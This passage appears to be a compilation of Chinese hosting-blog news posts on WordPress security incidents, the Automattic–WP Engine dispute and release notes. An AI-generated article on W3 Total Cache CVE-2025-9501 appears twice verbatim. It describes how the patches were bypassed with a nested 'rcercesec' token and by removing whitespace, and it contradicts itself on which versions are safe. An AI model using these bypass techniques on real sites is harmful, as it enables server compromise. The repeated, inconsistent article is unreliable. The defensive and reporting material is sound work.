所在的安全公司 Sucuri 自2017年开始跟踪该恶意软件运动,并将其命名为 Balada。Sucuri 估计,在过去6年中,Balada 已成功控制超过100万个网站。 仅上个月,Sucuri 就检测到 Balada 注入代码影响了超过1.7万个网站,几乎是之前一个月的两倍。超过9千个新的感染都是通过利用 CVE-2023-3169漏洞实现的。 Balada 攻击者一直试图获取所入侵网站的持续控制权。最常见的方式是注入可创建管理员权限账户的脚本。如果真正的管理员只删除重定向脚本而保留假冒的管理员账户,攻击者就可以利用管理权限再次添加恶意重定向脚本。 使用 WordPress 主题 Newspaper 或 Newsmag 的网站管理员应仔细检查自己的网站和事件日志,寻找感染的迹象。正如前文所述,Balada 攻击者试图获取对入侵网站的持续访问权限。除删除添加的恶意脚本外,还有必要检查后门代码和任何管理员账户的添加情况。 #### WordPress W3 Total Cache缓存插件曝高危漏洞:CVE-2025-9501漏洞三次补丁均告失效,100万站点面临高危风险 📰 导语:一次“漏洞修复”的失败实验,暴露插件生态的深层危机 2025年12月24日,科技媒体Cyberkendra披露了WordPress头部缓存插件W3 Total Cache的严重安全危机:其近期被曝出的漏洞CVE-2025-9501,连续三次补丁版本(2.8.13、2.8.14、2.8.15)均被研究人员证明存在绕过风险,修复过程被形容为“安全马戏团”。该插件全球安装量超100万,漏洞利用门槛低且影响范围广泛,已成为当前WordPress安全领域的焦点事件。 W3 Total Cache作为优化网站性能的核心工具,其漏洞根源在于插件内部用于处理动态内容的_parse_dynamic_mfunc函数中调用了PHP的eval()函数。这一设计虽旨在提升动态页面加载效率,却意外为攻击者打开了“后门”——只要在评论中注入特定代码,插件便可能将其当作合法指令执行,进而导致服务器端请求伪造(SSRF)、敏感信息泄露甚至服务滥用。 🛠️ 漏洞细节与三次补丁的“失效链” 核心漏洞:eval()函数的“信任陷阱” CVE-2025-9501的严重性源于其利用逻辑的简洁性。攻击者无需复杂技术,仅需满足三个条件即可发动攻击:1.获取管理员配置的W3TC_DYNAMIC_SECURITY令牌:该令牌通常为一串秘密字符串,用于动态内容处理的权限控制;2.网站允许未登录用户发布评论:默认配置下,部分站点开放了此功能;3.页面缓存功能处于开启状态:这是插件实现性能优化的基础,却也成为漏洞利用的必要前提。 三次补丁的“攻防拉锯” 研究人员“wcraft”最初向WPScan披露该漏洞时,其影响范围覆盖2.8.13及之前所有版本,CVSS评分为9.0,被直接定义为“严重”级别。厂商的修复尝试却暴露了“防御逻辑粗糙”的问题: 2.8.13版本:试图通过str_replace函数移除恶意标签,但攻击者可构造嵌套令牌(如“rcercesecsec”),当程序剔除中间的“rcesec”后,剩余字符自动重组为有效令牌,绕过防御; 2.8.14版本:虽增加了更多检查逻辑,但漏洞依然存在,未彻底解决问题; 2.8.15版本:转向检测标签后的空格(正则\\s+),却忽视了原代码允许“零空格”(正则\\s*)的特性,攻击者只需删除标签与令牌间的空格,即可再次穿透防线。 这一系列修复尝试的失败,直接导致大量站点仍处于高风险状态。尽管厂商已发布最新版本(2.8.15),但根据WordPress.org的下载统计,仅约15万站点更新了补丁,仍有数十万站点未修复,漏洞窗口持续开放。 🧨 行业背景:插件生态的“信任悖论” W3 Total Cache并非首次陷入安全争议。早在2024年,其旧版插件(2.8.2及之前)曾因“能力检查缺失”导致漏洞CVE-2024-12365被公开,攻击者可通过访问插件的is_w3tc_admin_page函数中的安全随机值(nonce)执行越权操作。 此类事件反映了WordPress插件生态的深层矛盾: 功能与安全的权衡:插件开发者为提升性能(如缓存加速)常引入动态执行逻辑(如eval()),但此类逻辑一旦被滥用,便成为系统性风险; 用户习惯的脆弱性:大量站点依赖插件实现核心功能,却忽视了插件版本更新的必要性,导致“已知漏洞”长期暴露; 补丁验证的滞后性:厂商修复逻辑的粗糙性与研究人员的快速验证,形成“漏洞披露-补丁失效-二次修复”的恶性循环。 🛡️ 企业的应对:从“补丁依赖”到“主动防御” 面对CVE-2025-9501的持续威胁,管理员需采取以下措施:1.紧急升级与审计: 升级至最新修复版本(当前为2.8.15),并立即审计W3TC_DYNAMIC_SECURITY常量的唯一性,确保其未被泄露或篡改。 若插件版本无法及时升级,需关闭页面缓存功能或限制未登录用户的评论权限,直接切断漏洞利用条件。 2.日志审查与痕迹排查: 安全公司建议管理员重点审查2025年10月以来的评论日志,排查是否存在异常代码注入痕迹(如包含恶意标签的评论)。 利用正则表达式(如<\s\*rcercesec)扫描历史评论内容,识别潜在攻击证据。 3.防御策略的多层化: 限制插件数量:避免安装非必要的插件,减少攻击面; 部署Web应用防火墙(WAF):通过WAF规则(如拦截异常评论输入或可疑请求)识别并阻止漏洞利用尝试; 启用输入过滤与输出转义:对用户输入内容进行严格清理,避免恶意代码嵌入,同时对动态输出进行安全转义(如HTML实体编码),防止代码执行风险。 📌 结语:一次“补丁失效”的教训,一次“插件安全”的警钟 W3 Total Cache的三次补丁失败事件,不仅是技术修复逻辑的教训,更是对WordPress生态安全管理的全面拷问。对于企业或个人站点而言,安全防御不能仅依赖“升级插件”,更需主动审计配置、限制功能、部署多层防御工具(如WAF),以应对插件生态中“功能即风险”的现实。 主机帮提醒:若您运营WordPress站点,建议立即检查W3 Total Cache版本(受影响范围为2.8.13及之前),升级至最新版并审计安全令牌;对于插件管理,遵循“最小化安装”原则,避免“信任即风险”的陷阱。(注:本文基于Cyberkendra与BleedingComputer等媒体的公开信息及行业分析整理,具体攻击细节与厂商后续修复方案需以官方披露为准。) 由小艺AI生成 🔐【主机帮深度速报】WordPress头部缓存插件陷入“安全马戏团”:CVE-2025-9501漏洞三次补丁均告失效,100万站点面临高危风险 📰 导语:一次“漏洞修复”的失败实验,暴露插件生态的深层危机 2025年12月24日,科技媒体Cyberkendra披露了WordPress头部缓存插件W3 Total Cache的严重安全危机:其近期被曝出的漏洞CVE-2025-9501,连续三次补丁版本(2.8.13、2.8.14、2.8.15)均被研究人员证明存在绕过风险,修复过程被形容为“安全马戏团”。该插件全球安装量超100万,漏洞利用门槛低且影响范围广泛,已成为当前WordPress安全领域的焦点事件。 W3 Total Cache作为优化网站性能的核心工具,其漏洞根源在于插件内部用于处理动态内容的_parse_dynamic_mfunc函数中调用了PHP的eval()函数。这一设计虽旨在提升动态页面加载效率,却意外为攻击者打开了“后门”——只要在评论中注入特定代码,插件便可能将其当作合法指令执行,进而导致服务器端请求伪造(SSRF)、敏感信息泄露甚至服务滥用。 🛠️ 漏洞细节与三次补丁的“失效链” 核心漏洞:eval()函数的“信任陷阱” CVE-2025-9501的严重性源于其利用逻辑的简洁性。攻击者无需复杂技术,仅需满足三个条件即可发动攻击:1.获取管理员配置的W3TC_DYNAMIC_SECURITY令牌:该令牌通常为一串秘密字符串,用于动态内容处理的权限控制;2.网站允许未登录用户发布评论:默认配置下,部分站点开放了此功能;3.页面缓存功能处于开启状态:这是插件实现性能优化的基础,却也成为漏洞利用的必要前提。 三次补丁的“攻防拉锯” 研究人员“wcraft”最初向WPScan披露该漏洞时,其影响范围覆盖2.8.13及之前所有版本,CVSS评分为9.0,被直接定义为“严重”级别。厂商的修复尝试却暴露了“防御逻辑粗糙”的问题: 2.8.13版本:试图通过str_replace函数移除恶意标签,但攻击者可构造嵌套令牌(如“rcercesecsec”),当程序剔除中间的“rcesec”后,剩余字符自动重组为有效令牌,绕过防御; 2.8.14版本:虽增加了更多检查逻辑,但漏洞依然存在,未彻底解决问题; 2.8.15版本:转向检测标签后的空格(正则\\s+),却忽视了原代码允许“零空格”(正则\\s*)的特性,攻击者只需删除标签与令牌间的空格,即可再次穿透防线。 这一系列修复尝试的失败,直接导致大量站点仍处于高风险状态。尽管厂商已发布最新版本(2.8.15),但根据WordPress.org的下载统计,仅约15万站点更新了补丁,仍有数十万站点未修复,漏洞窗口持续开放。 🧨 行业背景:插件生态的“信任悖论” W3 Total Cache并非首次陷入安全争议。早在2024年,其旧版插件(2.8.2及之前)曾因“能力检查缺失”导致漏洞CVE-2024-12365被公开,攻击者可通过访问插件的is_w3tc_admin_page函数中的安全随机值(nonce)执行越权操作。 此类事件反映了WordPress插件生态的深层矛盾: 功能与安全的权衡:插件开发者为提升性能(如缓存加速)常引入动态执行逻辑(如eval()),但此类逻辑一旦被滥用,便成为系统性风险; 用户习惯的脆弱性:大量站点依赖插件实现核心功能,却忽视了插件版本更新的必要性,导致“已知漏洞”长期暴露; 补丁验证的滞后性:厂商修复逻辑的粗糙性与研究人员的快速验证,形成“漏洞披露-补丁失效-二次修复”的恶性循环。 🛡️ 企业的应对:从“补丁依赖”到“主动防御” 面对CVE-2025-9501的持续威胁,管理员需采取以下措施:1.紧急升级与审计: 升级至最新修复版本(当前为2.8.15),并立即审计W3TC_DYNAMIC_SECURITY常量的唯一性,确保其未被泄露或篡改。 若插件版本无法及时升级,需关闭页面缓存功能或限制未登录用户的评论权限,直接切断漏洞利用条件。 2.日志审查与痕迹排查: 安全公司建议管理员重点审查2025年10月以来的评论日志,排查是否存在异常代码注入痕迹(如包含恶意标签的评论)。 利用正则表达式(如<\s\*rcercesec)扫描历史评论内容,识别潜在攻击证据。 3.防御策略的多层化: 限制插件数量:避免安装非必要的插件,减少攻击面; 部署Web应用防火墙(WAF):通过WAF规则(如拦截异常评论输入或可疑请求)识别并阻止漏洞利用尝试; 启用输入过滤与输出转义:对用户输入内容进行严格清理,避免恶意代码嵌入,同时对动态输出进行安全转义(如HTML实体编码),防止代码执行风险。 📌 结语:一次“补丁失效”的教训,一次“插件安全”的警钟 W3 Total Cache的三次补丁失败事件,不仅是技术修复逻辑的教训,更是对WordPress生态安全管理的全面拷问。对于企业或个人站点而言,安全防御不能仅依赖“升级插件”,更需主动审计配置、限制功能、部署多层防御工具(如WAF),以应对插件生态中“功能即风险”的现实。 主机帮提醒:若您运营WordPress站点,建议立即检查W3 Total Cache版本(受影响范围为2.8.13及之前),升级至最新版并审计安全令牌;对于插件管理,遵循“最小化安装”原则,避免“信任即风险”的陷阱。(注:本文基于Cyberkendra与BleedingComputer等媒体的公开信息及行业分析整理,具体攻击细节与厂商后续修复方案需以官方披露为准。) #### wordpress WooCommerce插件如何翻译中文 经常有站长安装woocommerce后,显示的都是英文,这是因为没有安装翻译包所致,我们只需要下载上传安装翻译包即可。 woocommerce中文翻译包下载地址:http://woocommerce.chongyuan.cc/woocommerce-zh_CN.mo 下载后上传到wordpress程序目录:wp-content/languages/plugins/ 即可。 #### WordPress “高级自定义字段”插件漏洞 200万网站面临网络攻击的风险 5月9日,据theregister报道,超过200万的WordPress网站使用高级自定义字段(Advanced Custom Fields)和高级自定义字段专业版(Advanced Custom Fields Pro),这些插件用于网站运营商更好地控制内容和数据。然而,由于插件中的一个漏洞,这些网站面临着网络攻击的风险。 该漏洞由Patchstack研究员Rafie Muhammad于2月5日发现并报告给插件供应商Delicious Brains。该公司于一个月后发布了插件补丁版本。 根据Patchstack发布的漏洞详细信息,这个漏洞被追踪为CVE-2023-30777CVSS,严重性评分为6.1(满分10),使网站容易受到反射XSS攻击,进而允许恶意代码注入网页并在访问者的浏览器中执行。如果访问者是登录的管理用户,那么他们的帐户可能会被劫持,导致网站被不法分子操控。 该机构补充道,“这个漏洞可能会在高级自定义字段插件的默认安装或配置中触发。XSS也只能由有权访问高级自定义字段插件的登录用户触发。”建议用户至少将插件更新到6.1.6版本以避免风险。 #### WordPress 与托管商 WP Engine 决裂,禁止其访问平台资源 9 月 28 日消息,WordPress 开发商 Automattic 与托管商 WP Engine 昨日宣布决裂,Automattic 现已禁止 WP Engine 访问 WordPress.org。 此前,Automattic 首席执行官兼 WordPress 的共同创建者马特・穆伦维格(Matt Mullenweg)批评 WP Engine 从开源 WordPress 项目中牟取超过 4 亿美元的收入,称其为“WordPress 的毒瘤”,并指责该公司对社区的贡献微乎其微。 WP Engine 则反驳 Mullenweg 的指控,称自己是第一的 WordPress 平台,自豪于对 WordPress 生态的贡献,并认为相关攻击只是 Automattic 想要索取更多授权费用,声称 Automattic 要求其继续支付数千万美元才能继续使用 WordPress 商标。 双方互相争执不下,最终,Automattic 于北京时间昨天正式封禁了 WP Engine 的访问权限,这意味着由 WP Engine 托管的用户将无法通过后台更新 / 安装 WordPress 主题插件。对此 WP Engine 回应称 Automattic CEO 马特・穆伦维格滥用对 WordPress 的控制权。 WP Engine 向用户表示,Automattic 实行的政策意味着他们无法通过 WP Admin 安装或更新主题 / 插件,但对网站的性能及安全并无影响。 On September 28th, news broke that Automattic, the developer of WordPress, and the hosting provider WP Engine announced a split, with Automattic now prohibiting WP Engine from accessing WordPress.org。Previously, Automattic's CEO and WordPress co-creator Matt Mullenweg criticized WP Engine for profiting over $400 million from the open-source WordPress project, calling it a "cancer to WordPress" and accusing the company of contributing very little to the community。In response, WP Engine refuted Mullenweg's allegations, claiming to be the premier WordPress platform and taking pride in its contributions to the WordPress ecosystem. They argued that the attacks were merely an attempt by Automattic to demand more licensing fees, stating that Automattic required them to continue paying tens of millions of dollars to use the WordPress trademark。The dispute escalated, and Automattic officially banned WP Engine's access rights, which means users hosted by WP Engine will no longer be able to update/install WordPress themes and plugins through the backend. WP Engine stated in response that Automattic CEO Matt Mullenweg was abusing his control over WordPress. They reassured users that Automattic's policy, which prevents them from installing or updating themes/plugins via WP Admin, does not affect website performance or security。 #### WordPress 内部出现分歧,大量遣散持不同意见员工 10 月 4 日消息,WordPress 联合创始人兼 Automattic 公司 CEO 马特・穆伦维格(Matt Mullenweg)近日向与自己就针对 WP Engine 的斗争意见相左的员工提供了离职补偿金,金额为 3 万美元或 6 个月工资(取较高者)。穆伦维格周四晚上更新信息称,共有 159 名员工接受了该提议,占公司总人数的 8.4%。 Automattic 负责运营 WordPress.com 及其商业服务,近期与第三方主机托管服务商 WP Engine 陷入公开争执。穆伦维格将 WP Engine 称为 WordPress 社区的“毒瘤”,并禁止其访问 WordPress.org。他声称 WP Engine 侵犯了 WordPress 商标,并且批评其未回馈 WordPress 开源项目。作为回应,由私募股权公司 Silver Lake 持股的 WP Engine 于周三对穆伦维格和 Automattic 提起诉讼,指控其敲诈勒索。Automattic 则称该诉讼“毫无根据”。 “Silver Lake 和 WP Engine 对我以及 Automattic 的攻击毫无根据,但却奏效了,”穆伦维格写道,“很明显,Automattic 公司的不少同事不同意我的做法和举措。”他让员工在 10 月 3 日之前决定是否要离开公司,离职员工将无法重新受雇。 根据穆伦维格的说法,离职主要影响了公司的 WordPress 生态系统部门,接受离职补偿金的员工中有 79.2% 来自该部门。“这周就像过山车一样,”穆伦维格写道,“不过现在我感觉轻松了很多。我感谢所有接受离职补偿金的同事,对于那些拒绝 1.26 亿美元的补偿金而选择留下的员工,我更是感到振奋。” 此外,WordPress 执行董事约瑟法・哈登・乔姆福西(Josepha Haden Chomphosy)确认已经离开公司。 On October 4th, it was reported that Matt Mullenweg, co-founder of WordPress and CEO of Automattic, recently offered severance packages of $30,000 or 6 months' salary (whichever is higher) to employees who disagreed with him regarding the conflict with WP Engine. Mullenweg updated on Thursday night that a total of 159 employees, accounting for 8.4% of the company's total workforce, accepted the offer. Automattic, which operates WordPress.com and its commercial services, has recently been involved in a public dispute with WP Engine, a third-party hosting service provider. Mullenweg described WP Engine as a "cancer" within the WordPress community and banned it from accessing WordPress.org. He alleged that WP Engine violated WordPress trademarks and criticized it for not contributing back to the WordPress open-source project. In response, WP Engine, owned by private equity firm Silver Lake, filed a lawsuit against Mullenweg and Automattic on Wednesday, accusing them of extortion. Automattic described the lawsuit as "baseless.""The attacks by Silver Lake and WP Engine against me and Automattic are baseless, but they have worked," Mullenweg wrote. "It is evident that many colleagues at Automattic disagree with my actions and initiatives." He gave employees until October 3rd to decide whether they wanted to leave the company, noting that departing employees would not be eligible for rehire.According to Mullenweg, the departures primarily affected the company's WordPress ecosystem department, with 79.2% of the employees accepting the severance packages coming from that department. "This week has been like a roller coaster," Mullenweg wrote. "But now I feel a lot lighter. I am grateful to all colleagues who accepted the severance packages, and I am even more excited about the employees who chose to stay despite turning down $126 million in compensation."Additionally, Josepha Haden Chomphosy, the executive director of WordPress, confirmed her departure from the company. #### WordPress 建站平台出现骚乱,开发商和托管商口水战升级 9 月 26 日消息,科技媒体 TechCrunch 昨日(9 月 25 日)发布博文,报道称全球最大建站平台 WordPress 出现骚乱,有可能升级为一场围绕商标的法律战。 公司简介 这场骚乱的双方: Automattic:WordPress 平台背后的网页设计公司,成立于 2005 年 8 月。 WP Engine:WordPress 数字体验平台,全球主流 WordPress 托管公司之一,成立于 2010 年。 Automattic 称 WP Engine 为“WordPress 毒瘤” Automattic 首席执行官兼 WordPress 的共同创建者马特・穆伦维格(Matt Mullenweg)上周批评 WP Engine 从开源 WordPress 项目中牟取暴利,称其为“WordPress 的毒瘤”,并指责该公司对社区的贡献微乎其微。 Automattic 在周一的信中称,WP Engine 在未经授权的情况下使用其 WordPress 商标,从而获得了超过 4 亿美元的收入。 Automattic 还称,WP Engine 误导消费者,让其相信两家公司之间存在直接关联。 WP Engine 公司周一发给 Automattic 公司的终止信中,该公司捍卫了自己根据合理使用法使用“WordPress”商标的权利。 该公司补充说,Automattic 对商标法和 WordPress 基金会的商标政策都存在严重误解。 WP Engine 公司表示穆伦维格过度索取授权费用,要求数千万美元才能继续使用起商标,这占据了总收入的很大一部分。 WP Engine 在信中说:“当他无耻的经济要求没有得到满足时,Mullenweg 先生通过向 WP Engine 的员工、客户和全世界反复发表诋毁 WP Engine 的虚假言论来实施他的威胁”。 WordPress 是一个以 PHP 和 MySQL 为平台的自由开源的博客软件和内容管理系统。WordPress 具有插件架构和模板系统。 截至 2018 年 4 月,排名前 1000 万的网站中超过 30.6% 使用 WordPress。WordPress 是最受欢迎的网站内容管理系统。全球有大约 43% 的网站都是使用 WordPress 架设网站的,包括主机帮也在使用WordPress 作为内容管理系统。 #### WordPress 推出 AI 网站建设,类似于百度“秒哒” 4 月 10 日消息,博客平台 WordPress 周三推出了一款新的 AI 网站构建器,任何人都可以使用 AI 聊天式界面创建一个可运行的网站。 该公司表示,该功能免费提供给 WordPress 用户,目标用户包括企业家、自由职业者、博主和其他需要专业网络形象的人士。 目前,这款 AI 构建工具只能生成简单的页面,尚无法创建更高级的网站,例如电子商务商店或其他需要复杂集成的网站。 要使用这款新工具,用户需要以对话的方式与 AI 聊天机器人互动,用自己的文本和图片设计网站,并配置网站的布局。然后,用户可以注册或登录他们的 WordPress 账户以观看 AI 为他们构建网站。网站创建后,用户可以与 AI 聊天进行更改,或者手动调整内容。 虽然 AI 工具是免费的,但为了将最终完成的网站向公众发布,用户需要购买托管计划。这些计划通常从每年 48 美元(现汇率约合 353 元人民币)的个人网站到每年 300 美元(现汇率约合 2207 元人民币)的企业网站不等。 然而,WordPress 官方表示,使用 AI 构建器创建的用户需要在高级版(每年 96 美元,现汇率约合 706 元人民币)和企业版之间进行选择。 这其实与百度之前推出的“秒哒” 平台类似,也是AI建站,不过最终发布需要托管至百度智能云平台。 目前全球出现很多AI建站平台,不过基本都是收费服务,而且生成的网站也只能运营在对方平台上,无法独立部署,这大概是AI建站目前最主要的盈利方式吧,不过托管在对方平台上有一个很大的风险,即当这个AI平台倒闭后,你的网站将面临无法访问的风险。 #### WordPress 插件 AIOS被爆漏洞 7 月 14 日消息,All-In-One Security(AIOS)是一款热门的 WordPress 网页插件,目前全球有超过 100 万个站点使用。 AIOS 近日曝出安全漏洞,该插件以明文纯文本形式记录用户密码,站长可以访问数据库直接查看和提取这些密码。 AIOS 今天发布了安全补丁,修复了上述安全漏洞。 AIOS 在授权过程中收集用户密码。根据开发者的说法,记录明文密码是由于今年 5 月发布的 AIOS 5.1.9 代码中出现的软件错误所致。 开发者本周发布了 AIOS 5.2.0,安装后可修复写入密码的问题,会删除之前添加到数据库的数据。 AIOS 开发人员的代表证实了这一点,“您必须以顶级管理员权限登录才能利用此 bug。”IT之家注:信息安全专家长期以来一直不鼓励网站管理员以明文形式存储密码。 #### WordPress 第三方“用户登录系统”插件曝零日提权漏洞,20 万网站受影响 7 月 4 日消息,Ultimate Member 是 WordPess 博客平台中一款相当受欢迎的“用户登录系统”插件。安全公司 Wordfence 目前曝出该插件存在零日漏洞,黑客可将自己的账号提权为管理员,进而控制接管网站。 ▲ 图源 Wordfence 据悉,该插件存在编号为 CVE-2023-3460 的重大漏洞,风险评分为 9.8,黑客可利用该漏洞,绕过此插件内置的各项安全措施,修改账号的 wp_capabilities 配置数据,以将黑客的账号设置为管理员角色,进而控制受害网站。 ▲ 图源 Wordfence 插件开发者在 6 月 26 日发布 Ultimate Member 2.6.3 版本进行了该漏洞进行了部分修复,此后在 7 月 1 日发布了 2.6.7 版本,完全修复了该漏洞。 部署该插件的 WordPress 网站超过 20 万个,考虑到这一预装量及信息差导致的插件更新延迟,这些网站依然极容易遭到黑客攻击。 #### Wordpress 计划放弃对 IE 11浏览器支持 在全球范围内最知名,也是最受欢迎的博客平台 WordPress 正在考虑放弃对 Internet Explorer11的支持,因为该浏览器的使用率已跌破1%。 WordPress 通过多个维度来确定仍在使用 IE11的人数,最终发现其累计使用率低于1%。IE11的使用人数与 WordPress 在2017年放弃支持 Internet Explorer8、9和10时的情况类似。 由于如此低的使用人数和维护浏览器的高成本,WordPress 计划在未来取消对 Internet Explorer11的支持。 WordPress上周在博客文章中解释道:"就目前WordPress的用户体验而言,大约在13个月前,BrowseHappy 就增加了一个不推荐 IE 的标志,所以到现在,大多数 WordPress 用户应该对此都有所了解。与此相关的是,在 IE11中的整体体验也并非是最佳的,开发者的维护成本很高。" 为了制定具体的放弃支持计划,WordPress 要求仍在使用 IE11浏览器的用户和组织在3月18日前提供反馈。 WordPress 并不是唯一一个放弃支持 IE11的公司。早在2020年8月,微软就宣布他们将不再支持 Microsoft Teams 应用在 IE11浏览器上使用,并且从2021年8月17日开始,Microsoft365也将不再支持 IE11。 #### wordpress-5.4.2-zh_CN更新 wordpress中文版下载地址 wordpress5.4.2版本已于2020年6月11日更新,本次更新内容: 此安全和维护版本具有23个修复和增强功能。此外,它还添加了许多安全修复程序-请参阅下面的列表。 这些错误会影响WordPress 5.4.1和更早版本。5.4.2版修复了这些问题,因此您需要升级。 如果尚未更新到5.4,则还有5.3和更早版本的更新版本可以为您修复错误。 安全更新 WordPress 5.4和更早版本受以下错误的影响,这些错误已在5.4.2版中修复。如果尚未更新到5.4,则还有5.3和更早版本的更新版本可解决安全问题。 向Sam Thomas(jazzy2fives)提出的XSS问题的建议,其中经过验证的低特权用户可以将JavaScript添加到块编辑器中的帖子中。 Luigi的道具–(gubello.me)发现XSS问题,具有上载权限的经过身份验证的用户可以在媒体文件中添加JavaScript。 支持WordPress安全团队的Ben Bidner在wp_validate_redirect()中找到一个打开的重定向问题。 Nrimo Ing Pandum的道具,用于通过主题上传找到经过身份验证的XSS问题。 向RIPS Technologies的Simon Scannell提出的建议,以发现一个问题,即设置屏幕选项可能被插件滥用而导致特权升级。 向Carolina Nymark提出的建议是发现一个问题,在某些情况下可以显示受密码保护的帖子和页面的评论。 感谢所有记者  私下披露这些漏洞。这使安全团队有时间修复可攻击WordPress网站的漏洞。 还向版本5.1、5.2和5.3部署了一个维护更新。有关更多信息,请参见相关的开发人员说明。 您可以在Trac上浏览更改的  完整列表。 有关更多信息,请浏览Trac上的更改的完整列表,或查看5.4.2版  文档页面。 WordPress 5.4.2是一个短期维护版本。下一个主要版本将是  5.5版。 您可以从此页面顶部的按钮下载WordPress 5.4.2,或访问 仪表板→更新  ,然后单击  立即更新。 如果您的站点支持自动后台更新,则它们已经开始更新过程。   #### wordpress-5.6.2-zh_CN中文版更新 国内下载地址发布 此维护版本包括 5个错误修复。这些错误会影响WordPress 5.6.1版,因此您需要升级。 WordPress 5.6.2是一个小型维护版本,致力于修复5.6.1中发现的面向用户的问题。 下一个主要版本将是 5.7版,目前计划于2021年3月9日发布。 官方下载地址https://cn.wordpress.org/download/ 如果由于外网原因下载不了的,可直接在主机吧下载。   #### wordpress-5.7-zh_CN中文版发布 国内下载地址 之前wordpress官方升级了英文版的wordpress-5.7,今天就开始更新中文版了,速度挺快的。 主机吧升级后相比5.5升级5.6那时的速度感,没感觉有多大变化,当然各位同学该升级还是要升级的,毕竟安全些。 已经为各位站长下载了最新版的wordpress-5.7-zh_CN压缩包存到百度网盘上了,有需要的同学可以下载手动升级下。   #### wordpress-5.7.1-zh_CN中文版下载 国内下载地址 WordPress安全和维护版本– 5.7.1于4月发布。该版本修复了两个主要的安全问题,并修复了26个错误。 官方下载地址:https://cn.wordpress.org/download/ 考虑到国内个别用户无法下载官方版本,这里主机吧把wordpress-5.7.1-zh_CN下载到了百度网盘供大家下载。 wordpress-5.7.1-zh_CN中文版下载 国内下载地址 #### wordpress-5.8.1-zh_CN中文简体版更新 WordPress 5.8.1现已推出! 除了3个安全修复外,此安全和维护版本还提供了60个错误修复。由于这是一个安全版本,建议您立即更新站点。自WordPress 5.4以来的所有版本也已更新。 WordPress 5.8.1是一个短周期安全和维护版本。下一个主要版本将是5.9版。 您可以从WordPress.org下载WordPress 5.8.1,或者访问您的仪表板→ 更新,然后单击立即更新。 如果您有支持自动后台更新的站点,则它们已经启动了更新过程。 安全更新 3安全问题影响WordPress在5.4和5.8之间的版本。如果您尚未更新到5.8,则自5.4以来的所有WordPress版本也已更新,以修复以下安全问题: Props@mdawaffe,WordPress安全团队成员,负责修复REST API中的数据暴露漏洞。 Securityum的MichałBentkowski在块编辑器中报告XSS漏洞的道具。 Lodash库已在每个分支中更新为4.17.21版,以纳入上游安全修复程序。 除了这些问题之外,安全团队还要感谢以下人员在WordPress 5.8 beta测试期间报告漏洞,允许他们在发布前修复漏洞: Props Evan Ricafort报告了在5.8版本测试期间发现的块编辑器中的XSS漏洞。 支持Steve Henty在块编辑器中报告权限提升问题。 感谢所有记者私下披露这些漏洞。这让WordPress安全团队有时间在WordPress站点受到攻击之前修复漏洞。 #### wordpress-5.8.2-zh_CN中文简体版更新 下个版本5.9版 WordPress 5.8.2 现已推出! 除了1 个安全修复程序外,此安全和维护版本还具有2 个错误修复程序。由于这是一个安全版本,建议您立即更新您的站点。自 WordPress 5.2 以来的所有版本也已更新。 WordPress 5.8.2 是一个专注于安全和维护的小版本。下一个主要版本将是5.9版 。 您可以从 WordPress.org 下载 WordPress 5.8.2,或访问您的仪表板 → 更新并单击立即更新。如果您的网站支持自动后台更新,则它们已经开始更新过程。 如果后台不支持更新,也可下载下方下载地址,手动更新。 #### wordpress-5.9.1-zh_CN中文版发布更新 WordPress 5.9.1 现已推出! 此维护版本在核心和块编辑器中修复了 82 个错误。 WordPress 5.9.1 是一个短周期维护版本。 下一个主要版本将是 6.0 。 #### wordpress-5.9.2-zh_CN更新,wordpress中文版百度网盘下载 WordPress 5.9.2 现已推出! 此安全和维护版本还具有 1 个错误 除了 3 个安全修复之外, 因为这是一个 安全版本 ,建议您立即更新您的站点。 自 WordPress 3.7 以来的所有版本也已更新。 WordPress 5.9.2 是一个安全和维护版本。 下一个主要版本将是 6.0 。 #### wordpress-5.9.3-zh_CN更新,百度网盘下载 WordPress 5.9.3 现已推出! 此维护版本在核心中修复了 9 个错误,在块编辑器中修复了 10 个错误。 WordPress 5.9.3 是一个短周期维护版本。 下一个主要版本将是 6.0 。 #### wordpress-6.0.1-zh_CN更新,中文下载地址 此维护版本包含 13 个核心错误修复 和 18 个 块编辑器错误修复。 WordPress 6.0.1 是一个短周期维护版本。 您可以通过阅读 RC1 公告 。 下一个主要版本将是 6.1 版 计划在 2022 年晚些时候 #### wordpress-6.0.2-zh_CN 中文版更新下载 WordPress 6.0.2 现已推出! 此安全和维护版本包含 12 个 Core 、 5 个 块编辑器错误修复和 3 个安全修复。 因为这是一个 安全版本 ,建议您立即更新您的站点。 自 WordPress 3.7 以来的所有版本也已更新。 WordPress 6.0.2 是一个短周期版本。 您可以通过阅读 RC1 公告 。 下一个主要版本将是 6.1 版 计划于 2022 年 11 月 1 日 如果您有支持自动后台更新的网站,更新过程将自动开始。 您可以 从 WordPress.org 下载 WordPress 6.0.2 ,或访问您的 WordPress 仪表板,单击“更新”,然后单击“立即更新”。 有关此版本的更多信息,请 访问 HelpHub 站点 。 此版本中包含的安全更新 安全团队要感谢以下人员负责任地报告漏洞,并允许在此版本中修复它们: Fariskhi Vidyan 用于在 Link API 中发现可能的 SQL 注入。Khalilov Moe 在插件屏幕上发现 XSS 漏洞。John Blackbourn ,用于发现其中的输出转义问题 the_meta(). #### wordpress-6.2-zh_CN发布,中文版国内下载 欢迎使用 WordPress 6.2 WordPress 6.2 包含超过 292 项功能增强及 394 项错误修复。 此页面重点介绍了自 2022 年 11 月后 WordPress 6.1 发布的新功能。 从快速摘要到开发者资源,都可在这里找到。 通过站点编辑器预览并编辑您的站点 更新后的界面让您可以更便捷地控制站点编辑体验。 浏览模板和模板组件的完整预览,后从选定的任何位置开始编辑站点。 使用导航区块以更多方式管理站点菜单 A new sidebar experience makes it easier to edit your site’s navigation. Add, remove, and reorder menu items faster—no matter how complex your menus are. Discover a smoother experience for the Block Inserter A refreshed design gives you more visibility and easier access to the content you need. Use the Media tab to drag and drop content from your existing Media Library quickly. Find patterns faster with a split view that lets you navigate categories and see previews all at once. Find the controls you want when you need them Your block settings sidebar is better organized with tabs for Settings and Styles. So the tools you need are easy to identify and access. Build faster with headers and footers for block themes Discover a new collection of header and footer patterns to choose from. Use them with any block theme as a quick, high-quality starting point for your site’s templates. Explore Openverse media right from the Editor Openverse’s library catalogs over 600 million free, openly licensed stock images and audio—and now it’s directly integrated into the Editor. Focus on writing with Distraction Free mode For those times you want to be alone with your ideas. You can now hide all your panels and controls, leaving you free to bring your content to life. Experience the Site Editor, now out of beta Stable and ready for you to dive in and explore: 6.2 is your personal invitation to discover what the next generation of WordPress—and Block themes—can do. Style Book Use the new Style Book to get a complete overview of how every block in your site’s library looks. All in one place, all at a glance. Copy and paste styles Perfect the design on one type of block, then copy and paste those styles to other blocks to get 